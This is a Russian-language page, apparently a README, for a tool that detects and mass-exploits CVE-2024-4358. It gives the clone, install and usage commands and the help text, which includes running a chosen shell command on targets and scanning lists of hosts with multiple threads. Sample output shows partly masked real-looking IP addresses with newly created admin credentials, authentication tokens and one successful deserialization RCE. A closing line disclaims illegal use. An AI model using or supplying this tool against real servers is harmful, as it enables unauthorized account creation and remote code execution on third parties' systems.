
Инструмент для обнаружения и эксплуатации уязвимости CVE-2024-4358
Инструмент для обнаружения и массовой эксплуатации уязвимости CVE-2024-4358
git clone https://github.com/RevoltSecurities/CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
python3 exploit.py -h
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Описание]: Инструмент для обнаружения и эксплуатации уязвимости CVE-2024-4358
options:
-h, --help показать это сообщение справки и выйти
-u URL, --url URL [ИНФ]: Укажите URL или IP с портом для обнаружения уязвимости
-l LIST, --list LIST [ИНФ]: Укажите список URL или IP для обнаружения уязвимости
-c COMMAND, --command COMMAND
[ИНФ]: Укажите команду оболочки для выполнения
-t THREADS, --threads THREADS
[ИНФ]: Количество потоков для списка URL
-proxy PROXY, --proxy PROXY
[ИНФ]: Прокси-URL для отправки запроса через ваш прокси
-v, --verbose [ИНФ]: Увеличивает подробность вывода в консоли
-o OUTPUT, --output OUTPUT
[ИНФ]: Имя файла для сохранения вывода уязвимого целевого объекта
python3 exploit.py -l urls.txt -c id -t 10
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Уязвимый]: Отчет для: http://13.42.129.XXX
Учетные данные: Имя пользователя: ozsebbQpibJbHpghuNLxutxBOl | Пароль: NvmpjJucmxtqhOtdFtrxfoguvQ | Токен аутентификации: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
Десериализация RCE: Неудачно
[Уязвимый]: Отчет для: http://52.2.58.XX
Учетные данные: Имя пользователя: pjzgrOrjJXqQyFoubmrcSkHZHC | Пароль: ZrGVXZqIrgWkuHCgUlkHIeYPG | Токен аутентификации: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
Десериализация RCE: Неудачно
[Уязвимый]: Отчет для: http://194.233.XXX.235:83
Учетные данные: Имя пользователя: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Пароль: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Токен аутентификации: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
Отчет создан: ELHaimYtblAxViEKIXxpdFyOXNlEHb
Десериализация RCE: Успешно
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s)
Инструмент разработан D.Sanjai Kumar @RevoltSecurities для обнаружения и массовой эксплуатации уязвимости CVE-2024-4358. Инструмент предназначен только для образовательных и этических целей, и разработчики не несут ответственности за любое незаконное использование.